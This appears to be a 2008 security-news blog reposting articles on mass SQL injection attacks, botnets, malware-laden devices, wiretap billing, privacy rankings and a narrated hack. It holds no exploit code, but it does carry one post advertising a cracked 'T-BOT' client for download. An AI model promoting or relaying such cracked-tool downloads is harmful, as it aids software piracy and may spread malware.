Security needs driving multi-layered approach

The need for higher levels of security is pushing organisations towards multi-layered products that offer access control, video surveillance and other security devices in a single platform.

Open communications protocols, networks and faster computers have led to the diversification of IP networks to newer areas of the organisation, according to Archana Umesh Rao, a research analyst at Frost & Sullivan.

As a result, interoperability is being extended to other applications such as security.
The research revealed that, as the security industry moves from analogue to digital to IP, vendors and customers are looking to create more secure environments by integrating services rather than using isolated security products.

Corporate security services such as video surveillance, access control and fraud detection are increasingly database-driven and network-delivered, leading to IP becoming more tightly tied in with physical security.

Combined services can have other benefits such as preventing hackers from accessing corporate networks internally by slipping through security gates behind genuine employees.

However, the research also found that implementation has been sluggish owing to low end-user awareness about the benefits of integrating disparate security products.

The use of integrated systems has also been restricted to high-end applications because of the high cost of network infrastructure and integration software.

"The convergence of physical security with IP involves a complex amalgamation of security and networking technology," explained Rao.

"In this context, superior customer service and technical support will be crucial to gaining a competitive advantage in the market."

The report concludes that user education about the benefits and return on investment of security integration should be the key focus for industry participants in order to drive adoption.

Posted in | 0 comments

FBI Wiretap Cut Off After Feds Fail To Pay Telecom Spying Bills

The FBI routinely failed to pay telecom companies promptly for providing phone and internet lines to the FBI's impressive domestic surveillance architecture -- resulting in at least one phone company cutting off a foreign intelligence wiretap until the FBI paid its bill, according to an audit released Thursday.

The Justice Department's Inspector General also found that telecom charges and invoices for surveillance overwhelmed the FBI's ability to keep track of their bill and that one field office got a $66,000 bill from a carrier for unpaid surveillance work.

Some of the problems stemmed from telecoms billing multiple times for individual surveillance warrants -- which, in the case of Cox Communications, costs $1500 for a 30-day wiretap order. But telecoms also bill the FBI for internet connections and phone lines that connect the carrier's wiretap-friendly switches with the FBI's wiretap software system known as the Digital Collection System.

Former FBI agent and now ACLU national security policy counsel Mike German directed his ire at the telecoms who happily played along with the government's warrantless spying and let the FBI illegally get customer records following requests to get surveillance today with false promises to pay with a court order tomorrow.

"To put it bluntly it sounds as though the telecoms believe it when FBI says warrant is in the mail but not when they say the check is in the mail," German said.

Each field office has wiretap recording computers that are meshed together with all the other field offices and HQ through a secure fiber optic network operated by Sprint.

The Inspector General found that the FBI was often confused about whether to use confidential case funds or general HQ money to pay the telecoms, and were even so confused that when telecoms issued refunds, they sometimes sent the refunds back to the carriers.

In 2006, DCS 5000, the FBI's national security wiretapping software, captured 27,728,675 communication sessions, according to released FBI documents, but the documents do not define what a "session" consists of. That year the FBI reported winning 2,176 FISA, or Foreign Intelligence Surveillance Act, warrants from a secret court.

To learn more about the FBI's wiretap network and software, start with "Point, Click ... Eavesdrop: How the FBI Wiretap Net Operates" and find out even more -- including details on the FBI's cell phone tracking vans -- in "FBI E-Mail Shows Rift Over Warrantless Phone Records Grab."

Posted in | 0 comments

U.S. ranks near the bottom in 2007 International Privacy Ranking

The Electronic Privacy Information Center and Privacy International just published its 1,000-page “Privacy and Human Rights Report,” which assesses the state of surveillance and privacy protection in 70 countries.

Following are the key findings from the report. Needless to say, privacy is eroding in most parts of the planet. The lowest ranking countries included Malaysia, Russia and China, while Greece, Romania and Canada had the highest rankings in this year’s report. The U.S. was graded poorly, as an “endemic surveillance society.”

  • The 2007 rankings indicate an overall worsening of privacy protection across the world, reflecting an increase in surveillance and a declining performance of privacy safeguards.
  • Concern over immigration and border control dominated the world agenda in 2007.
  • Countries have moved swiftly to implement database, identity and fingerprinting systems, often without regard to the privacy implications for their own citizens.
  • The 2007 rankings show an increasing trend amongst governments to archive data on the geographic, communications and financial records of all their citizens and residents. This trend leads to the conclusion that all citizens, regardless of legal status, are under suspicion.
  • The privacy trends have been fueled by the emergence of a profitable surveillance industry dominated by global IT companies and the creation of numerous international treaties that frequently operate outside judicial or democratic processes.
  • Despite political shifts in the US Congress, surveillance initiatives in the US continue to expand, affecting visitors and citizens alike.
  • Surveillance initiatives initiated by Brussels have caused a substantial decline in privacy across Europe, eroding protections even in those countries that have shown a traditionally high regard for privacy.
  • The privacy performance of older democracies in Europe is generally failing, while the performance of newer democracies is becoming generally stronger.
  • The lowest ranking countries in the survey continue to be Malaysia, Russia and China.
  • The highest-ranking countries in 2007 are Greece, Romania and Canada.
    The 2006 leader, Germany, slipped significantly in the 2007 rankings, dropping from 1st to 7th place behind Portugal and Slovenia.
  • In terms of statutory protections and privacy enforcement, the US is the worst ranking country in the democratic world.
  • In terms of overall privacy protection the United States has performed very poorly, being out-ranked by both India and the Philippines and falling into the “black” category, denoting endemic surveillance.
  • The worst ranking EU country is the United Kingdom, which again fell into the “black” category along with Russia and Singapore. However for the first time Scotland has been given its own ranking score and performed significantly better than England & Wales.
  • Argentina scored higher than 18 of the 27 EU countries.
  • Australia ranks higher than Slovakia but lower than South Africa and New Zealand.

privacy1.jpg

privacy2.jpg

Posted in | 0 comments

SQL attack continues to infect Web sites

A Web attack that compromises vulnerable Web pages and installs a snippet of code to redirect visitors to a malicious site in China continued to spread this week, according to security experts.

The attack, which started at the end of December and was first mentioned on Chinese sites, infects Web sites running Microsoft's Internet Information Server Web software and MS SQL database software, according to the Internet Storm Center, a network-monitoring group run by the SANS Institute. Compromised sites are seeded with iframe code that redirects visitors to two sites in China, uc8010.com and ucmal.com, that attempt to execute a relatively old exploit for RealPlayer via Javascript.

While the attack is "massive and ugly," according to independent security researcher Dancho Danchev, it has also been very successful. The number of Web pages apparently affected by the attack has continued to rise over the past week. A Google search for parts of the iframe code currently returns nearly 100,000 pages for each domain. While Google search results are not an accurate way to measure the spread of malicious software, they can be a good indicator of the trend of an attack.

Given the success in seeding the redirection code on legitimate Web servers, the use of an old RealPlayer exploit in the attack puzzled some security experts.

"It is weird," said Roger Thompson, chief research officer for antivirus maker AVG. "I think the simplest explanation is is that they found a really good server side exploit, but didn't think the rest of the attack through."

The attack appears, in many ways, similar to last year's compromises that, among other victims, hit the Web site of Super Bowl venue Dolphin Stadium, adding an iframe redirect to sites hosting malicious code. This year, security firm Computer Associates was reportedly among the victims.

Both domains used in the attack are only a few weeks old. The uc8010.com domain was registered on December 28, and the ucmal.com domain was registered on Deceember 21, according to the Whois database.

Posted in | 0 comments

Geeks.com loses customer data in hack

Computer gadget site Geeks.com has been hacked, with the attackers suspected of stealing customer credit card details, phone numbers and e-mail addresses.

Reports say Geeks.com sent out a letter at the weekend to its customers, admitting that customer information, including names, addresses, telephone numbers, e-mail addresses, credit card numbers, expiration dates, and card verification numbers, may have fallen into the wrong hands.

The website displays a banner from McAfee's ScanAlert service certifying that it is a hacker-safe site.

Calum Macleod, European director at security firm Cyber-Ark, said, "Quite apart from the fact that a supposedly secure website - and one that has been certified as such - has been hacked, it highlights the need for all commercial organisations to encrypt their customer data, if they are not to lose face or even face lawsuits from disgruntled customers."

Posted in | 0 comments

Android hacked into hardware

HARDWARE hackers have been having fun attempting to put Google's Java-based Android software stack onto different hardware.

Linux Devices has been cruising around the hackers' various bogs and forum posts to see how they have been getting on.

It seems that while the software ships with an emulator based on Qemu, hardware might be a better target for application development.

Atmark-Techno's Armadillo-50, a development board based on Freescale's i.MX31L mobile applications processor, has been hacked to run the Android stack.

A software development outsourcing lab in Budapest known as "Eu.Edge" published an outline of booting Android on the Sharp SL-C760.

A Japanese user also managed to get the software running on a Sharp Zaurus C3000M and a Dutch Open Embedded Software Forum user named "cortez" posted links to an Android filesystem built to run alongside Poky Linux in a chrooted environment.

He installed Android on the SL-C3x00

Posted in | 0 comments

UK spooks deliberately leaked 'Squidgygate' tapes

The infamous "Squidgygate" tapes of Princess Diana speaking intimately with an alleged lover were recorded by the Government Communications Headquarters and deliberately leaked over the public airwaves, her former bodyguard told an inquest panel looking into her death.

The UK spy agency regularly bugged and taped Diana and other members of the royal family, according to Ken Warfe, who served as a bodyguard to the princess from 1987 to 1993. Ostensibly the reconnaissance was to protect the family from assassination by the Irish Republican Army.

A tape of a 1989 New Year's Eve conversation between Diana and James Gilbey contained a half-hour of pillow talk. Gilbey repeatedly told her, "I love you" and called her by the pet name "Squidgy" 53 times.

According to Warfe, the recording was made by the UK government's top secret monitoring station and then continuously broadcast until picked up by ham radio enthusiasts. The hams then turned the tapes over to the media. Warfe didn't say why the spooks wanted to make the conversations public.

The revelation came during an inquest into the August 1997 death of Diana, her boyfriend Dodi Fayed and driver Henri Paul in a high-speed car crash as they fled paparazzi in Paris.

It wasn't the only shocker let loose during the hearing.

Warfe said royal family members were jealous of Diana's popularity and that she believed private secretaries to the Queen and Duke of Edinburgh were "sharpening their knives" against her.

Because of her distrust of the royal family and of intelligence services, the princess in 1993 hired electronic surveillance experts to sweep her apartments at Kensington Palace for bugs. They posed as carpet fitters to avoid detection, Warfe said, but eventually four men were detained after they tried to access a telephone exchange.

The tender New Year's Eve exchange was recorded while Diana was staying with the Queen at Sandringham estate in Norfolk and Gilbey was at an undisclosed location speaking on a mobile phone.

After the conversation was recorded, it was broadcast on a loop until it was picked up by radio ham Cyril Reenan, who sold it to a newspaper. Reenan was said to have stumbled upon the conversation accidentally using a radio scanner.

Coverage from the Telegraph and the BBC are here and here, respectively

Posted in | 0 comments

Phishers now leasing the Storm worm botnet

A number of phishing sites have cropped up within the last day using domains previously attributed to the Storm worm botnet. Last fall, Storm was used in a series of pump-and-dump stock spam blasts, including a unique MP3-based spam blast, but researchers at F-Secure don't think the original authors of Storm are necessarily trying something new. F-Secure said Tuesday that "October brought evidence of Storm variations using unique security keys. The unique keys...allow the botnet to be segmented allowing 'space for rent.'" They think phishers are leasing parts of the larger botnet.

F-Secure cites a Halifax bank as one of the phishing targets, while Trend Micro identifies the Royal Bank of Scotland as another. What connects these sites are the server domains hosting the pages. Trend Micro said Tuesday it detected the hosts "while watching domain activity normally associated with suspected RBN (Russian Business Network) -associated activities."

The original Storm worm code, so named because it coincided with a severe winter storm in Europe, will celebrate its first anniversary next week, on or around January 19.

Posted in | 0 comments

SoBig anniversary marks birth of the botnet

Wednesday (9 January) marks the fifth anniversary of the SoBig-A virus, an item of malware experts reckon marked the transition to money rather than mischief as the main drive behind malware creation.

While it wasn't until August 2003 that a variant of the malware (SoBig-F) caused disruption on a massive scale, the first iteration of the virus in January began what became a steadily evolution in cybercrime. SoBig "irrevocably changed" the malware landscape by heralding the introduction of the botnet phenomenon, according to email security firm MessageLabs.

The SoBig worm in its various guises commonly appeared as an attachment to electronic messages with subject lines such as "Re: Approved", "Thank you!", or "Re: That movie". The body of email messages containing text such as "See the attached file for details" designed to tempt prospective marks into infectious .pif or screensaver files. The rudimentary social engineering technique was then new but didn't really take off until a sequel of the worm released some months after the first variant of the malware hit the net.

The driving force behind all variants of SoBig was to distribute self-replicating Trojans which created botnets of compromised zombie PCs, useful for the distribution of spam or other nefarious purposes. Following the introduction of anti-spam legislation in 2003, botnets provided the anonymity that spammers required and the increasing penetration of always-on home broadband networks made them increasingly effective as a distribution tool. The increased ineffectiveness of older techniques - such as open mail relays - in a face of evolving spam filtering technologies helped further fuel the transition to a new cybercrime economy based on trade in compromised PCs and hacker tools.

Five years on, the malware landscape has become even more sophisticated. Recent months have seen the evolution of the Storm worm Trojan and other sophisticated "professionally developed" botnet clients, such as Nugache, a new malware strain that can be controlled without use of a command and control server.

Posted in | 0 comments

Malware hitches a ride on digital devices

It's time to add digital picture frames to the group of consumer products that could carry computer viruses and Trojan horse programs.

In the past month, at least three consumers have reported that photo frames -- small flat-panel displays for displaying digital images -- received over the holidays attempted to install malicious code on their computer systems, according to the Internet Storm Center, a network-threat monitoring group. Each case involved the same product and the same chain of stores, suggesting that the electronic systems were infected at the factory or somewhere during shipping, said Marcus Sachs, who volunteers as the director of the Internet Storm Center.


"When (the first incident) pops up, we thought it might be someone that was infected and blamed it on the digital picture frame," Sachs said. "But this is malware -- and malware that does not seem to be very well detected. You could plug in a device and infect yourself with something that you would never know you had."

The incidents underscore that the proliferation of electronic devices with onboard memory means that consumers have to increasingly be aware of the danger of unwanted code hitching a ride. While many consumers are already wary of certain devices, such as digital music players, USB memory sticks and external hard drives, that include onboard memory, other types of electronics have largely escaped scrutiny.

In the past, consumer devices infected with malicious code have generally been the result of manufacturing mishaps. In October 2007, for example, hard-disk drive maker Seagate acknowledged that a password-stealing Trojan horse program had infected a number of its disk drives shipped from a factory in China after a computer at the manufacturing facility was infected. The Trojan horse would infect systems and attempt to steal the account credentials to Chinese online games as well as the popular World of Warcraft.

In another incident, a Windows computer virus snuck onto the hard drives of a limited number of Apple's iPods during manufacturing in 2006.

Going forward, infections may no longer always be accidental, said Sachs, who is also the executive director of government affairs at telecommunications provider Verizon.

"I think that supply-side attacks are going to go from zero to some small percentage," he said. "It is obviously not going to be as dangerous as mass mailing e-mail infections, but you could have some really clever targeted attacks."

In the latest incidents, three photo frames made by Tuscaloosa, Ala.-based Advanced Design Systems, and bought from different Sam's Club stores, each contained a Trojan horse, according to reports to the SANS Internet Storm Center. The malicious code appears to act like a rootkit, hiding itself and disabling access to antivirus resources.

"It propagates to any connected device by copying a script, a com file and an autorun file," one consumer reported to the ISC. "It hides all systems files and itself while completely eliminating the user admin ability to show hidden files. It creates processes that negate any attempt to go to anti virus and anti spam web sites. It prevents the remote installation of any antivirus components."

Advanced Design Systems did not immediately respond to requests for comment sent by e-mail and left on its voicemail system on Tuesday. A media representative of Wal-Mart, which owns the Sam's Club discount warehouse chain, could not comment on the issue when contacted Monday and did not provide a comment in time for publication.

Keeping malicious code off of consumer products is a serious issue, said Larry Landry, a software expert and digital-picture frame expert at Eastman Kodak. Landry was frank about the chances of any manufacturer eliminating the risk of accidental infection: A company cannot rule out an infection in the factory, but it can make the probability of such an incident very unlikely, he said.

"Kodak works very closely with our suppliers to see that they have the latest version of antivirus software on the manufacturing systems," Landry said. "We also ask that any PCs in the factory are not connected to the Internet."

Kodak is not among the manufacturers whose products were allegedly compromised by the Trojan horse program.

Following the report of an infected digital photo frame on Christmas Day, the Internet Storm Center called for more information and turned a single incident into a steady drip, if not a flood, of anecdotes from consumers. Other devices that reportedly came with a viral hitchhikers included hard drives, MP3 players and music-playing sunglasses.

While a compromise at the manufacturer is the most likely scenario, ISC's Sachs also pointed to retailers as a possible point of infection. Returned products, which could have been infected by the consumer, are frequently put back on the shelf, if they are in sale-able condition, and attackers could take advantage of a store's poor digital hygiene, he said.

"Trying to (infect a product) all the way back at the factory -- getting it through all the checks and balances -- would be pretty hard to do," he said. "But doing it at the store, where there might be loose return policies, and (where) they put it back on the shelf -- you are not going to get a million infections, but you might get a person from an investment bank next door."

Yet, among the major threats to consumers' PCs and data, infection by a consumer product is a relatively minor one, said Mikko Hyppönen, chief research officer for antivirus firm F-Secure, adding: "It'll happen."

Consumers will have to be careful with any device that can be connected to a PC, including USB thumb drives, GPS devices, mobile phones, video players, set top boxes, portable hard drives, memory card readers, and eventually even microwave ovens and other appliances, he said.

Wal-Mart, the owner of Sam's Club, told the ISC that its security team had randomly checked several dozen picture frames and did not find additional infections, Sachs said. A representative of Wal-Mart reached by SecurityFocus could not immediately comment on the issue.

Posted in | 0 comments

The malware 'shadow economy'

Viruses, malware and online crime are evolving from the realm of geeks into a major shadow economy that closely mimics the real world.

Maksym Schipka, a senior architect at security firm MessageLabs, claims to have identified a sophisticated online black market with tens of thousands of participants.

This underground internet economy is worth over $105bn, making it bigger than the global drugs trade.

Collectively, online criminals are using the techniques of the free market to subvert and corrupt legitimate online business.

In his report Schipka lays out the basic workings of this system, comparing it to a normal high street experience.

As with high street stores, online crime breaks down into a series of specialised trades.

Malware writers first create new viruses, spyware, and Trojans to infect computers, but the majority do not distribute the code themselves.

In fact, they make great play of offering their software 'for educational purposes only' in the hope that this provides some immunity from prosecution.

The malware writers then sell this code for as little as $250 and customers can subscribe to updates for an extra $25 a month which ensures that the malware evades detection.

The middleman who buys malware from a programmer then typically uses the services of a botnet owner to spread it.

Once the malware has spread, the middleman can sit back and start to collect stolen information and stolen identities which are then sold on to make money.

According to Schipka's research, a full identity sells for around $5. This includes name and address, a passport or driving licence scan, credit card numbers and bank account details.

Credit card numbers sell for between two and five per cent of the remaining credit balance on the cards in questions.

As competition is stiff, identity thieves offer customers a high level of service. For example, people can buy identities sorted by a given country, industry, role or credit card sorted by remaining balance.

There are a range of other services offered within the shadow economy, including a system of guarantors and escrow accounts to help thieves make sure they are not ripped off themselves.

Another sign of growing sophistication is the continuous improvement in the quality of products on sale in the shadow economy.

Malware writers will offer guarantees that a given virus or Trojan will not be detected using current antivirus programs, and the malware author will supply a new version if vendors update their software.

The shadow economy has all the attributes of a traditional economy - division of labour, price competition, marketing etc - but accelerated to internet speed and carried out online.

Schipka warned that, while it is interesting to observe these classic economic principles at work, it suggests that malware is going to get more common and more virulent.

The researcher explained that many conventional antivirus programs rely on 'signatures' to detect malware and update their signature files as new malware comes to light.

However, this means that a signature can only be created after a new virus is in the wild and is attacking computers. Worse, malware authors can also download the signatures and test their creations against the latest updates.

Schipka's research suggests that malware authors can produce new unique malware every 45 seconds in order to keep it undetected.

With this in mind, Schipka recommends security program developers to use a combined signature-based and heuristic scanner to help maximise the strength of their products.

Posted in | 0 comments

Zango strikes back over reported Facebook hack

Officials with Zango, a maker of Web-based advertising software, are aggressively refuting last week's report from security device maker Fortinet which claimed that the adware firm's programs were being secretly passed along to end users by an application made available on Facebook.

Tabbed by Fortinet as the first major malware/greyware/badware hack to find itself onto the social networking portal, Zango leaders said in a statement released late Monday that claims of its involvement with a Facebook widget dubbed Secret Crush are "blatantly untrue."

As reported in my original story, and based on my interview with Guillaume Lovet, a regional manager of Fortinet's Threat Response Team, the initial claim made by the security company appeared to be that the Secret Crush program -- marketed to Facebook users under the guise of a tool that allowed them to find out about other members who found them attractive -- secretly installed Zango adware.

Upon further review, that appears at least in part to have been a mistake in interpretation of the bulletin and Mr. Lovet's observations on my part.

In the end, Fortinet is charging that Secret Crush merely "directed [users] to an external Web site inviting them to download applications such as MyWebSearch, which allows for pop-up advertising," to quote Chris Boyd, aka PaperGhost, who also blogged on the confusion last night.

To that end, Zango representatives said that once a user was sent to the aforementioned Web site after downloading Secret Crush, they were presented with a legitimate end user licensing agreement that informed them of all of the intricacies of its adware programs.

According to Zango:

"What the Fortinet report writer saw was simply an ad for a Zango application after the widget was added to a Facebook profile – an ad not connected to the widget and not unlike any other ad on the Internet that might appear on a Web page. The Zango advertisement, seen by Fortinet's researcher but not by Zango's security team at any point during the subsequent investigation, was just one in a series of rotating advertisements that a user might see after installing the Secret Crush application. If clicked on, the ad led users to Zango's standard notice and consent process."

The party that could really shed light on his whole confusing situation is Facebook itself, but they've yet to return any of my calls or e-mails on the matter. Social networking they appear to do well, PR, not so well.

Meanwhile, Fortinet is sticking to its original report:

"After additional investigation, Fortinet confirms that our research related to the 'Secret Crush' (Facebook Widget) was accurate as of posting our advisory on January 2, 2008," the company said in a statement on Tuesday. "The behavior shown in our screen shots simply showcases the observations the FortiGuard Global Security Research Team made on that date. We stand behind our original research."

So, it's a classic game of he said, she said, but, as with PaperGhost's assessments (and he has doggedly pursued Zango for its questionable practices in the past), it does seem based on the reported details that Zango at least served up its EULA before allowing end users to click through and grab its programs, which is all it is required to do really.

I still think that Facebook should do a better job of policing the apps that get loaded onto its site, and that Zango needs to be as transparent as possible if it is serious about changing its image from a shady adware firm to a legitimate ethical business, as its media representatives claim that it has.

But, we in the security community who picked up on this story so eagerly should also be reminded to look into all the details of any security bulletin before we report on it.

Sorry for any confusion.

Facebook finally got back to me on Wednesday, and while they can't dig up anyone to talk about this whole issue of security and social networking (which is pretty surprising since it's a huge question mark before they launch Facebook Enterprise) here's the boilerplate statement they passed along:

"Facebook is committed to user safety and security and, to that end, its terms of service for developers explicitly state that applications should not use adware and spyware. Users should employ the same precautions while downloading software from Facebook applications that they use when downloading software on their desktop. We have contacted the developers and have disabled the Secret Crush application for violating Facebook Platform Terms of Service."

So, despite Zango's claims, it would seem that Facebook agreed with Fortinet that there was an element of adware involved that they felt violated their rules.

Posted in | 0 comments

Man gets record sentence for computer sabotage

A computer systems administrator was sentenced to 30 months in prison on Tuesday for trying to sabotage his company's servers out of fear he was about to lose his job, prosecutors said.

The U.S. Attorney's Office in Newark, N.J., said Yung-Hsun Lin received the longest ever federal prison term for a criminal attempt to damage a computer system.

He was also ordered to pay $81,200 in restitution to his former employer, pharmacy benefit manager Medco Health Solutions.

Lin, 51, admitted he modified computer codes and added code to create a "logic bomb" designed to wipe out servers on Medco's network in October 2003, around the time Medco was being spun off by Merck, authorities said.

Lin feared he might be affected by resulting layoffs. Part of the code included script to launch the attack on his birthday, but it failed, they said.

Medco servers contained software applications relating to clients' clinical analyses, rebates, billing, and managed care processing. The unauthorized coding was found by another computer administrator in January 2005, authorities said.

Posted in | 0 comments

SQL Injection Attacks Hit 70,000 Websites

Automated attacks spread across government and education environments as well as commercial sites



JANUARY 8, 2008 | An automated SQL injection attack has caused as many as 70,000 Websites to steer users toward malicious code over the last few days, according to researchers.

The attack adds a JavaScript tag to every piece of text in a Website's SQL database, the researchers said. The tag instructs any browser that reaches the site to execute the script hosted on the malicious server.

The automated attack hit a broad range of Websites, researchers said. "This was a pretty good mass-hack," said Roger Thompson, a researcher at Exploit Prevention Labs -- now a part of Grisoft -- in his blog. "It wasn't just that they got into a server farm, as the victims were quite diverse, with presumably the only common point being whatever vulnerability they all shared."

The SANS Institute's Internet Storm Center said the attack hit government and educational institutions as well as commercial sites. The SQL injection attack may also have played a part in the security problems experienced by Computer Associates over the weekend, SANS said.

Ironically, the attack was launched using an old client vulnerability, and it has been relatively easy to clean up, Thompson said.

"The only exploit we were able to [discover] was the venerable MS06-014 (MDAC) patched in September 2006," Thompson said. "What this means is that [the attackers] went to the trouble of preparing a good Website exploit, and a good mass-hack, but then used a mouldy [sic] old client exploit. It's almost a dichotomy."

Posted in | 0 comments

Microsoft closes a critical network flaw

Microsoft kicked off the new year by fixing three vulnerabilities on its first regularly scheduled patch day.

The most serious flaw affects the way that Windows systems handle storing the data associated with Internet Group Management Protocol (IGMP) and Multicast Listener Discovery (MLD) network requests. The vulnerability affects both Windows Vista and Windows XP Service Pack 2 and is rated Critical by Microsoft for those operating systems. An attacker could take control of a user's machine by sending it a specially-crafted IGMP or MLD request, Microsoft stated in its bulletin.

"An attacker who successfully exploited this vulnerability could take complete control of an affected system, ... (and) could then install programs; view, change, or delete data; or create new accounts with full user rights," Microsoft stated.

The company also fixed a problem in the way that Windows handles Internet Control Message Protocol (ICMP) requests, which could be exploited in a denial-of-service attack. Because the vulnerable component is not active by default, the software giant rated the flaw as Moderate, its third highest rating of severity for software flaws. The third vulnerability -- in Microsoft Windows' Local Security Authority Subsystem Service (LSASS) service -- could allow an attacker the ability to gain complete access to a system, if the person already has valid log-on credentials.

In 2007, Microsoft issued a total of 69 bulletins. On Tuesday, the software giant had not yet updated its Security Vulnerability Research & Defense blog, which it launched last month, with technical details of the flaws.

Posted in | 0 comments

German hackers fight electronic voting

Veteran German hacking group the Chaos Computer Club is fighting the use of electronic voting machines in upcoming local elections.

A lawsuit filed by the group against the German state of Hesse seeks a temporary injunction against the use of electronic voting machines that would prevent their use in 27 January local elections. The legal action contends that NEDAP voting computers due to be used in the count in eight districts are insecure and "susceptible to manipulation".


"Recourse to the court has become necessary since the Hesse state government evidently does not have the required expert knowledge to understand the technical security and transparency flaws of the voting machines, nor the will to act accordingly," the Chaos Computer Club explains.

Additional security measures added by the Hesse Ministry of the Interior to address concerns about the integrity of votes tallied using NEDAP voting computers are insufficient, the hackers argue. 45,000 people have signed its petition to reject e-voting machines.

Chaos Computer Club's legal offensive follows a successful attempt by Dutch hackers in banning the same type of NEDAP voting machines in the Netherlands. A Dutch judge last year ruled the use of 9,000 Nedap e-voting machines in recent Dutch elections unlawful because of a lack of adequate authorisation. Results compiled using the machine were, however, allowed to stand. The decision was hailed as a victory for the Dutch "we don't trust voting computers" foundation.

Posted in | 0 comments

Clarkson eats words over lost data

TV presenter Jeremy Clarkson has been forced to eat his own words after thieves hacked into his bank account.

Clarkson said in a newspaper column that the data lost by staff at HM Revenue & Customs was useless, and published his own bank details in the article to prove his point.

However, he was forced to apologise publicly after £500 was quickly removed from his account.

Clarkson gave his account number and sort code and hinted at his address. This was enough for him to lose the money.

"I opened my bank statement this morning to find out that someone has set up a direct debit which automatically takes £500 from my account," he wrote in a Sunday Times article.

"The bank cannot find out who did this because of the Data Protection Act and they cannot stop it happening again. I was wrong and I have been punished for my mistake."

The money was transferred to a charity, Diabetes UK, which did not require a signature to set up a standing order. Clarkson has now apologised and admitted that data loss is a serious issue.

"Contrary to what I said at the time, we must go after the idiots who lost the discs and stick cocktail sticks in their eyes until they beg for mercy," he said.

Posted in | 0 comments

Hackers turn Cleveland into malware server

Tens of thousands of websites belonging to Fortune 500 corporations, state government agencies and schools have been infected with malicious code that attempts to engage in click fraud and steal online game credentials from people who visit the destinations, security researches say.

At time of writing, more than 94,000 URLs had been infected by the fast-moving exploit, which redirects users to the uc8010-dot-com domain, according to this search. Security company Computer Associates was infected at one point, as were sites belonging to the state of Virginia, the city of Cleveland and Boston University.

"This is a wide variety of sites that have been impacted," said Mary Landesman, a researcher for ScanSafe, a company that provides real-time information to clients about malicious sites. "It's a real in-your-face example of what we see everyday. It's really time for companies that have a vested interest in a web presence to take a hard look at what their security posture is."

Malicious hackers were able to breach the sites by exploiting un-patched SQL injection vulnerabilities that resided on the servers, according to Johannes Ullrich, CTO for the SANS Internet Storm Center. The injections included javascript that redirected end users to the rogue site, which then attempted to exploit multiple vulnerabilities to install key-logging software that stole passwords for various online games, he and other researchers said.

In many respects, the attack resembles one that took place early last year on websites belonging to the Miami Dolphins football team just in time for the Super Bowl. Miscreants behind that attack exploited a bug in a content creation tool called DreamWeaver, which left much of the code on the website vulnerable to SQL injections. The attackers, which over the past year have struck other sites, were able to exploit the vulnerabilities using scripts that scour servers for the buggy code.

Ullrich said he was unsure where the vulnerability lies in the latest round of attacks.

Visiting uc8010-dot-com set off a chain of redirections that tried to use patched vulnerabilities to install key-logging software. Ullrich said he observed the sites using an old RealPlayer vulnerability. Roger Thompson of Exploit Prevention Labs, said here end users were also treated to a Windows vulnerability Microsoft patched in late 2006.

According to Landesman, the exploits forced end users to visit sites that pay third parties a fee in exchange for sending them traffic. She speculates the attackers signed up as affiliates of the sites and then profited each time an end user was infected. The malware also installed keyloggers on end user machines that stole passwords to various online games, Ullrich said.

He said the uc8010-dot-com domain (we don't recommend readers visit the site) was registered in late December using a Chinese-based registrar, indicating the attackers were fluent in Chinese.

As we've said before, end users should make sure browsers, browser plug-ins, media software and other applications are updated. Secunia's Software Inspector is one good way to do this. Also helpful is the use of the Firefox browser with the NoScript plug-in, which helps fortify users from many javascript attacks.

Posted in | 0 comments

T-BOT NoDC Client Version 1.140 CRACKED

T-BOT NoDC Client Version 1.140 CRACKED

download here

Posted in | 0 comments

Web tools create XSS headaches

Adobe Flash files created by a number of Web authoring platforms could be co-opted by an online fraudster to conduct a cross-site scripting attack, security researchers stated last week.

A paper authored by Google security researcher Richard Canning found that the Flash files created by at least five Web site authoring systems, including Adobe Dreamweaver and InfoSoft FusionCharts, could be used to to bypass anti-phishing measures. By creating a link that passes Javascript code to the Flash files, an attacker can cause a victim to run malicious code in the security context of a potentially trusted Web server, Canning stated in a summary of his findings.

While pinpointing which sites are running vulnerable Flash files is difficult, hundreds of thousands of Web sites could be affected, Web security researcher Jeremiah Grossman wrote on his blog this weekend.

"Because this issue is NOT a universal XSS as it is the case of the Adobe PDF bug, issues are going to be harder to track down," wrote Grossman, who is the chief technology officer for WhiteHat Security. 'We’re going to have to figure out ways decompile (or) reverse engineer Flash files to determine what authoring tool was used and update our vulnerability scanners so that Flash files can be tested in much the same ways as a web application."

The issue is separate from a vulnerability in Flash files that Adobe fixed last month, the researchers said. Adobe issued a patch in December to fix ten critical vulnerabilities in its Flash software, among them modifications to eliminate cross-site scripting attacks using the asfunction() and navigateToURL() functions. On December 24, InfoSoft fixed its cross-site scripting issue by allowing only the loading of relative URLs, not absolute URLs.

Grossman stressed that vulnerable Flash animations will remain on the Web for some time, as Web developers first have to patch their authoring tools, then create new Flash files and upload those files to their sites. In many cases, a third-party developer maintains the Web site, which will increase delays, he said.

Posted in | 0 comments

Anatomy of a hack attack

With the help of security experts, we reconstruct a typical hack attack on two large organisations and walk through the steps that the head of IT should follow in such a case.

Monday, 9am
Blackjack, a hacker working from an internet cafe in London, is about to launch an attack on a major government agency. His aim is to cause maximum disruption and embarrassment. And, according to security experts, his job is going to be worryingly easy.

"Most organisations have dozens of vulnerabilities they haven't patched, or aren't even aware of," said Toralv Dirro, a security strategist with McAfee. "Even if a penetration-testing service says you're not vulnerable, that only means they haven't found a vulnerability, not that one doesn't exist."

Blackjack has spent weeks researching his target, identifying names of employees, partners and current projects. He has identified a potential way into the network through People Inc, a staffing agency that provides temporary workers to the public sector and which has direct links to the government agency's website and HR database.

Even if a penetration-testing service says you're not vulnerable, that only means they haven't found a vulnerability, not that one doesn't exist

Toralv Dirro, McAfee

Using basic tools such as Arin and InterNIC, Blackjack is able to identify the IP address of People Inc's web server and database server, and knows what applications are running. Using a range of cracking tools, he also knows how packets move on the company's network, so he is able to establish connections to open ports without being detected. Finally, he uses a simple SQL injection or cross-scripting technique to gain access to the web server.

This is a relatively common and simple hacking technique, explained Rhodri Davies, a technical architect with security specialist Firestorm. "Basically, the attacker uses the existing interface but, rather than entering information, they write a command for the back-end database," he said. "For example, rather than entering a username, you command the database to send back a list of usernames and passwords."

Monday, 12pm
By lunchtime, the hacker has gained access to People Inc's web server, and he is able to access usernames and passwords which will gain him full network access. At this stage, there's a good chance People Inc won't even notice that its systems have been compromised, added Lee Dawson, a penetration tester with ethical hacking company dns. "Most corporates spend money on firewalls and intrusion-detection systems but they don't do anything to prevent web attacks," he said. "Very few have application layer gateways, so attacks on websites are very easy to miss."

